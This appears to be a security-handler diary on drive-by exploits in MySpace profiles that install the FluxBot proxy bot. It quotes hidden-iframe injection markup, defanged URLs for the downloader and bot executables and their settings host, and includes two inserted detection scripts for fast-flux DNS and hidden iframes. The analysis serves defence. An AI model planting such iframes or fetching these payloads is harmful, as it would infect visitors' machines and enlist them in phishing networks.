MySpace Flux Malware

CAREFUL! This diary contains links to malicious code!

A number of MySpace profiles include drive-by exploits. The exploits will install a version of "flux bot", a very popular proxy network bot.

FluxBot (aka "FastFlux", "Storm") is typically used to hide phishing and malware delivery sites behind complex, ever-changing networks of proxy servers. A system infected with FluxBot will be used as one of these proxies.
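The "ever-changing network of proxies" is visible from the defender's side in DNS: a fluxed name answers with short TTLs and rotates through many IPs spread across unrelated networks. The script below is an added example (not code from this diary or from the handler team) that scores domains from a constructed resolver log using those three indicators. The domain names and 10.x addresses are placeholders; using /16 spread as a stand-in for ASN diversity is a simplification chosen so the example runs offline.

```python
"""Fast-flux indicators from a DNS resolver log (added example, constructed data)."""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_network


@dataclass(frozen=True)
class DnsObservation:
    ts: int      # unix time the answer was seen (constructed values below)
    qname: str   # queried domain, lower-cased
    ip: str      # A record returned in the answer
    ttl: int     # TTL carried by that record


def _make_log():
    """Constructed resolver log: one fluxed name, one CDN-like name with a
    low TTL but a single network, and one ordinary static host."""
    log = []
    base = 1_700_000_000
    # Fluxed name: a new proxy IP in a different /16 every few minutes.
    flux_ips = ["10.12.0.5", "10.77.3.9", "10.3.200.1", "10.140.8.8",
                "10.21.6.60", "10.99.1.2", "10.8.44.3", "10.201.7.7"]
    for i, ip in enumerate(flux_ips):
        log.append(DnsObservation(base + 450 * i, "flux-node.example", ip, 180))
    # CDN-like name: low TTL and several IPs, but all inside one /16.
    for i, ip in enumerate(["10.50.1.1", "10.50.1.2", "10.50.2.3", "10.50.3.4"]):
        log.append(DnsObservation(base + 900 * i, "cdn.example", ip, 60))
    # Ordinary host: stable answer, long TTL.
    for i in range(2):
        log.append(DnsObservation(base + 1800 * i, "static.example", "10.9.9.9", 86400))
    return log


SAMPLE_LOG = _make_log()


def domain_indicators(log, window_seconds=3600):
    """Per-domain flux indicators over the most recent window of answers."""
    by_domain = defaultdict(list)
    for obs in log:
        by_domain[obs.qname].append(obs)
    indicators = {}
    for qname, answers in by_domain.items():
        newest = max(o.ts for o in answers)
        recent = [o for o in answers if o.ts >= newest - window_seconds]
        ips = {o.ip for o in recent}
        # /16 spread stands in for ASN diversity. An ASN lookup is the better
        # signal but needs an external database, so it is not used here.
        nets = {str(ip_network(f"{o.ip}/16", strict=False)) for o in recent}
        indicators[qname] = {
            "distinct_ips": len(ips),
            "distinct_nets": len(nets),
            "min_ttl": min(o.ttl for o in recent),
        }
    return indicators


def is_fast_flux(ind, min_ips=5, min_nets=3, max_ttl=300):
    """All three indicators must trip: many IPs, spread across networks,
    short TTL. Requiring network spread keeps a low-TTL CDN from matching."""
    return (ind["distinct_ips"] >= min_ips
            and ind["distinct_nets"] >= min_nets
            and ind["min_ttl"] <= max_ttl)


def classify(log):
    """Map each domain in the log to True when it looks fluxed."""
    return {q: is_fast_flux(i) for q, i in domain_indicators(log).items()}


if __name__ == "__main__":
    for qname, ind in domain_indicators(SAMPLE_LOG).items():
        print(f"{qname:20} {ind}  flux={is_fast_flux(ind)}")
```

Only flux-node.example trips all three thresholds; cdn.example has the short TTL and several IPs but no network spread, and static.example fails on every count. In a real deployment the thresholds would be tuned against the resolver's own baseline, and the /16 check replaced by an ASN lookup.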

  Infected MySpace "Friend IDs": 39184135, 171598920, 22057010

  A typical excerpt from an infected profile (obfuscated to protect the innocent): 


<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken."><img

The actual exploit / malware is served via an existing flux network. * will redirect the user to an encoded JavaScript which decodes to:

    <iframe src="http://fafb4c4c .com/header_03.gif" width=1
The domain used here is, of course, again served via flux. header_03.gif


    <iframe src="http://fafb4c4c .com/routine.php" width=1

Are we there yet? Yup. Just one more (patched) Internet Explorer exploit to go. The
exploit will install the .exe. For example:

http://fafb4c4c .com/session.exe (this is just the downloader stub)
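The two markers in the profile excerpt above, an anchor whose hostname is padded with "home.myspace.com.index.cfm.fuseaction..." labels so it reads like a MySpace URL, and a 1-pixel iframe pulling content from a fluxed domain, are both easy to check for in HTML before it is rendered. The scanner below is an added example, not code from this diary, and runs over a constructed profile fragment; attacker.example and video.example are placeholders, and the two-label "registrable domain" rule is a simplification (no public suffix list).

```python
"""Flag hidden iframes and brand-lookalike hostnames in profile HTML
(added example, constructed sample input)."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Brand domains whose name gets borrowed as leading labels in lookalike hosts.
BRAND_DOMAINS = {"myspace.com"}

# Constructed profile fragment: one honest link, one lookalike link with the
# hidden-anchor styling seen in the diary, one 1x1 iframe, one normal iframe.
SAMPLE_PROFILE = """
<div class="profile">
  <a href="http://home.myspace.com/index.cfm?fuseaction=user">my real profile</a>
  <a style="text-decoration:none;;top:1px;left:1px;"
     href="http://home.myspace.com.index.cfm.fuseaction.user.MyToken.attacker.example/"><img
     src="http://attacker.example/banner.jpg"></a>
  <iframe src="http://attacker.example/header_03.gif" width=1 height=1></iframe>
  <iframe src="http://video.example/player" width=400 height=300></iframe>
</div>
"""


def _as_int(value):
    """Parse an HTML size attribute; None when absent or not numeric."""
    if value is None:
        return None
    try:
        return int(value.strip().rstrip("%"))
    except ValueError:
        return None


class DriveByScanner(HTMLParser):
    """Collect (finding, detail) tuples for suspicious iframes and anchors."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)   # HTMLParser lower-cases attribute names for us
        if tag == "iframe":
            self._check_iframe(a)
        elif tag == "a":
            self._check_anchor(a.get("href") or "")

    def _check_iframe(self, a):
        width, height = _as_int(a.get("width")), _as_int(a.get("height"))
        style = (a.get("style") or "").replace(" ", "").lower()
        tiny = (width is not None and width <= 1) or (height is not None and height <= 1)
        hidden = "display:none" in style or "visibility:hidden" in style
        if tiny or hidden:
            self.findings.append(("hidden_iframe", a.get("src") or ""))

    def _check_anchor(self, href):
        host = (urlsplit(href).hostname or "").lower()
        labels = host.split(".")
        if len(labels) < 3:
            return
        # Simplified: treat the last two labels as the registrable domain.
        registrable = ".".join(labels[-2:])
        for brand in BRAND_DOMAINS:
            if registrable != brand and (host.startswith(brand + ".") or "." + brand + "." in host):
                self.findings.append(("lookalike_host", host))
                break


def scan_html(text):
    """Return findings in document order for the given HTML text."""
    scanner = DriveByScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PROFILE):
        print(f"{kind:15} {detail}")
```

The honest link passes because its registrable domain is the brand itself; the lookalike is caught because "myspace.com" appears only as interior labels of a host registered elsewhere. The size check looks at width and height independently, so a `width=1` frame with no height attribute is still flagged, and CSS hiding is covered as well since a `display:none` frame is just as invisible as a 1-pixel one.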

The downloader will now retrieve the actual bot. We have seen, among others, these:

http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe

Settings for the bot can be found here:

http://settings.iconnectyou .biz
http://fcs.camgenie .com/weby7.exe

Once it's all set and done, you will be a proud new member of the flux net, and soon you
will find your system participating in phishing and similar endeavours.

A couple of IPs that may be worthwhile to block:

AS13767 |
AS15083 |
AS25761 |
AS25761 |

As you can imagine, it's a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team.
